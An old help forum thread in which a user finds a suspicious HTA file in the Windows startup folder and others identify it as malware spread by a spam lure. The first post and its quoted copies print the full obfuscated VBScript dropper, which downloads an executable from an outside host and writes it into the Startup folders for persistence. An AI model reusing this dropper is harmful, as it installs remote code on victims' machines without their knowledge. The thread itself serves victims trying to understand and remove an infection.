| Author |
Message |
Cyber-Hun
Guest
|
 Posted:
Sat Jan 01, 2005 8:54 pm Post subject:
funny files in startup folder |
|
|
I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0 bytes).
My scanners(TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following::
-------------------
set o = CreateObject("m"+"sxml2.XML"+"HTTP") :
o.open "GET","http://paddy.home.comcast.net/xp.exe",False :
o.send :
set s = createobject("ad"+"odb"+".stre"+"am") :
s.type=1 :
s.open :
s.write o.responseBody :
s.savetofile "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\OfficeOSA.exe",2 :
s.savetofile "C:\Dokumente und Einstellungen\All
Users\Startmenu\Programme\Autostart\OfficeOSA.exe",2 :
window.self.close() :
--------------------------
I'm not fluent in vbscript, but doesn't this code get stuff from that
comcast url, and then put it in these files that it creates in the startup
folder?
Presumably it's supposed to run the 'stuff' it fetched from the comcast URL,
whatever it is, every time I reboot. Doesn't just the fact that this has
occurred at all indicate a breach? I don't know if I should be alarmed or
not, my scanners show me all the other places where malicious files can be
put where they will be automaticaly run (runonce, runservices, etc) and
there is nothing else there.
Can anyone fill me in on this, or relate similar occurrences? |
|
| Back to top |
|
 |
Dave
Guest
|
| Posted:
Sat Jan 01, 2005 9:58 pm Post subject:
Re: funny files in startup folder |
|
|
yep, funny for sure... that was apparently part of that 'santa like you have
never seen him before' spam from some kind of virus/worm. start scanning,
and keep scanning until you find it. spybot, adaware, hijackthis, etc, etc,
etc...
"Cyber-Hun" <th54@hotmail.com> wrote in message
news:GIzBd.664937$%k.4763@pd7tw2no...
| Quote: | I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0
bytes).
My scanners(TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following::
-------------------
set o = CreateObject("m"+"sxml2.XML"+"HTTP") :
o.open "GET","http://paddy.home.comcast.net/xp.exe",False :
o.send :
set s = createobject("ad"+"odb"+".stre"+"am") :
s.type=1 :
s.open :
s.write o.responseBody :
s.savetofile "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\OfficeOSA.exe",2 :
s.savetofile "C:\Dokumente und Einstellungen\All
Users\Startmenu\Programme\Autostart\OfficeOSA.exe",2 :
window.self.close() :
--------------------------
I'm not fluent in vbscript, but doesn't this code get stuff from that
comcast url, and then put it in these files that it creates in the startup
folder?
Presumably it's supposed to run the 'stuff' it fetched from the comcast
URL,
whatever it is, every time I reboot. Doesn't just the fact that this has
occurred at all indicate a breach? I don't know if I should be alarmed or
not, my scanners show me all the other places where malicious files can be
put where they will be automaticaly run (runonce, runservices, etc) and
there is nothing else there.
Can anyone fill me in on this, or relate similar occurrences?
|
|
|
| Back to top |
|
|
RustYŠ
Guest
|
| Posted:
Sat Jan 01, 2005 10:18 pm Post subject:
Re: funny files in startup folder |
|
|
"Cyber-Hun" <th54@hotmail.com> wrote in message
news:GIzBd.664937$%k.4763@pd7tw2no...
| Quote: | I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0
bytes).
My scanners(TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following::
|
I have that too.
It has now stopped me from using any anti-virus tools. Anything with virus
in the title and the window is closed !
I can't even search the net for a remedy - this is going to cause me some
trouble. |
|
| Back to top |
|
|
Cyber-Hun
Guest
|
| Posted:
Sat Jan 01, 2005 10:28 pm Post subject:
Re: funny files in startup folder |
|
|
I posted this in the comp.virus group, and apparently its an exploit called
bloodhound 21 or something and it was caused by that post; "Santa like you
have never seen before".
"RustYŠ" <RustY@Fishing.net> wrote in message
news:RXABd.310$6W3.279@newsfe3-win.ntli.net...
| Quote: |
"Cyber-Hun" <th54@hotmail.com> wrote in message
news:GIzBd.664937$%k.4763@pd7tw2no...
I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0
bytes).
My scanners(TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following::
I have that too.
It has now stopped me from using any anti-virus tools. Anything with
virus
in the title and the window is closed !
I can't even search the net for a remedy - this is going to cause me some
trouble.
|
|
|
| Back to top |
|
|
RustYŠ
Guest
|
| Posted:
Sat Jan 01, 2005 10:35 pm Post subject:
Re: funny files in startup folder |
|
|
"Cyber-Hun" <th54@hotmail.com> wrote in message
news:j5BBd.666036$%k.275591@pd7tw2no...
| Quote: | I posted this in the comp.virus group, and apparently its an exploit
called
bloodhound 21 or something and it was caused by that post; "Santa like you
have never seen before".
|
Guess what - I looked at that !!!
It was in a binaries group that I visit and I thought it was a picture of an
aeroplane ! ( Silly Bunt!!)
Thanks for that I'll keep looking.. |
|
| Back to top |
|
|
Cyber-Hun
Guest
|
| Posted:
Sat Jan 01, 2005 10:42 pm Post subject:
Re: funny files in startup folder |
|
|
I'm not an expert in this field, but it sounds you like you need a thorough
cleanup, amigo --- safe mode, roll-back, and all of that. I've learned my
lesson, I'm de-activating all my scripting and activex stuff, and maybe
switching to firefox.
Good luck, and keep us posted on your progress. btw happy new years!
"RustYŠ" <RustY@Fishing.net> wrote in message
news:0cBBd.320$6W3.167@newsfe3-win.ntli.net...
| Quote: |
"Cyber-Hun" <th54@hotmail.com> wrote in message
news:j5BBd.666036$%k.275591@pd7tw2no...
I posted this in the comp.virus group, and apparently its an exploit
called
bloodhound 21 or something and it was caused by that post; "Santa like
you
have never seen before".
Guess what - I looked at that !!!
It was in a binaries group that I visit and I thought it was a picture of
an
aeroplane ! ( Silly Bunt!!)
Thanks for that I'll keep looking..
|
|
|
| Back to top |
|
|
|
|
|
|
FAQ
Memberlist
Register
Profile
Log in to check your private messages
Log in